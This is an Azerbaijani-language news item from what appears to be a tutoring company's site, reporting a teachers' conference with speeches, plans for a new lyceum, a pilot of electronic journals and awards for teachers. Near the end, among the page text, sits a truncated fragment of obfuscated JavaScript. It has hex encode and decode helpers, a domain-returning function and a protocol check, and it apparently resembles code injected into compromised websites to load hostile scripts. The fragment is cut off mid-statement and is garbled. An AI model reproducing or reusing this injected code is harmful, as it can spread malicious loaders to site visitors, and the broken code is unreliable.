Buradasınız: Ana səhifə - HƏDƏF XƏBƏR - Hədəf kurslarında müəllimlərin konfransı-FOTO

Hədəf kurslarında müəllimlərin konfransı-FOTO

pedoqoji iclas 9Hədəf kursları və İstiqlal Tədris Mərkəzi müəllimlərinin 2015-2016-cı tədris ili üçün II pedoqoji iclası olub. Tədris ilinin başlağıcında keçirilən ilk iclasdan fərqli olaraq, bu dəfəki iclas bir növ hesabat xarakteri daşıyıb. Kursların il ərzində fəaliyyətinə nəzər salınıb, qarşıda duran məqsədlər barədə məlumat verilib və fərqlənən müəllimlər mükafatlandırılıb.

İclası açıq elan edən Hədəf kurslarının və İstiqlal Tədris Mərkəzinin həmtəsisçisi Şəmil Sadiq çıxış edərək müəllimləri Novruz bayramı münasibətilə təbrik edib. Müəllimliyin ağır, zəhmətli və sevinc dolu bir sənət olduğunu diqqətə çatdıran Şəmil Sadiq Hədəf şirkətlər qrupunun fəaliyyətinin günü-gündən genişləndiyini qeyd edib. Şirkətin məqsədinin yalnız təhsil vermək deyil, həm də müxtəlif sosial-mədəni tədbirlərdə, layihələrdə yaxından iştirak olduğunu xatırladıb. Kursun fəaliyyətində xüsusi əhəmiyyət daşıyan layihələr, kampaniyalar barədə ümumi məlumat verib. Belə kampaniyalardan ən önəmlisinin isə növbəti tədris ili üçün reklam kampaniyasıdır. Aprelin 10-dan start veriləcək kampaniya mayın 5-də qəbul imtahanı ilə yekunlaşacaq. Növbəti ildən kursda təhsil alacaq şagirdlər üçün xüsusi güzəştlərin də nəzərdə tutulduğu qeyd edilib.pedoqoji iclas 10

Konfransda müəllimlərin diqqətini çəkən əsas xəbərlərdən biri isə yeni liseyin açılması olub. Daha fərqli, yeni standartlarla tədrisin həyata keçiriləcəyi lisey üçün yaxın günlərdə müəllimlərin seçiminə başlanılacaq. Seçimlərdə tədris üsulları ilə seçilən, dərslərdə innovativ metodları tətbiq etməyi bacaran, kurikulum layihəsilə ilə yaxından tanış olan müəllimlərə üstünlük veriləcək. Liseyə müəllim qəbulu ilə bağlı elanların yaxın günlərdə verilməsi nəzərdə tutulur.

Şirkət rəhbəri həmçinin il ərzində yaşanan bəzi problemlərlə bağlı açıqlamalar və tövsiyyələrini verib.

Daha sonra çıxış edən şirkətin İcraçı direktoru Emin Sadiqov, Təhsil və tədris işləri üzrə direktor Elxan Nəcəfov, Sosial layihələr və xarici əlaqələr üzrə direktor Elvin Əliyev də mövcud problemlər və qarşıda duran məqsədlər barədə məlumat veriblər. Çıxışlar zamanı Hədəfin yeganə hədəfinin məzunlarının daha yüksək bal toplamalarına nail olmaq, əvvəlki illərdə əldə edilən və hər yüksələn nəticələri daha da artırmaq olduğu xüsusi vurğulanıb.
pedoqoji iclas 19Təhsil və tədris işləri üzrə direktor Elxan Nəcəfov müəllimlərin dərs və test tapşırıqlarının hazırlamaq bacarıqlarını artırmaq istiqamətində işlər aparıldığını bildirilib. Şagirdlərin biliklərinin qiymətləndirilməsi üçün görülən işlərdən danışan Elxan Nəcəfov imtahanlar, şagirdlərə fərdi yanaşma xarakterli dərslər barədə məlumat verib. Bu istiqamətdə yeni texnologiyalardan istifadə edildiyi diqqətə çatdırıb. Artıq bəzi filiallarda pilot layihə kimi elektron jurnalların tətbiq edildiyi vurğulayıb. Layihənin tətbiqində müəyyən problemlərin olduğunu da diqqətə çatdırıb. Lakin gələcək layihələrin həyata keçirilməsi, operativ məlumatlanmanı təşkil etmək üçün elektron jurnallardan daha səmərəli və geniş şəkildə istifadəsinin planlaşdırıldığı bildirib.
Sonda Hədəf kursları və İstiqlal Tədris Mərkəzinin inkişafında yüksək pedaqoji xidmət göstərən və ictimai fəallığı ilə fərqlənən müəllimlər mükafatlandırılıb, diplom və hədiyyələr verilib.Sosial layihələr və xarici əlaqələr üzrə direktor Elvin Əliyev isə il ərzində həyata keçirilən layihələr, tədbirlər, qurulan əməkdaşlıqlar, keçirilən seminarlar barədə məlumat verib. Müxtəlif layihələrin həyata keçirilməsi üçün xarici əməkdaşlıqların da genişləndirildiyini diqqətə çatdırıb. Bu əməkdaşlıqlar üçün müxtəlif xarici ölkələrə edilən səfərlər və onların nəticələri barədə danışıb. Elvin Əliyev həmçinin qarşıda gözlənilən böyük layihələr barədə də söhbət açıb. Müəllimlər “Oxu günü” adlı xüsusi əhəmiyyətli layihədə və digər tədbirlərdə fəal iştitaka dəvət edilib.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=”",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hedef.edu.az"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Sosial şəbəklərdə paylaş!
Yuxarıya qalx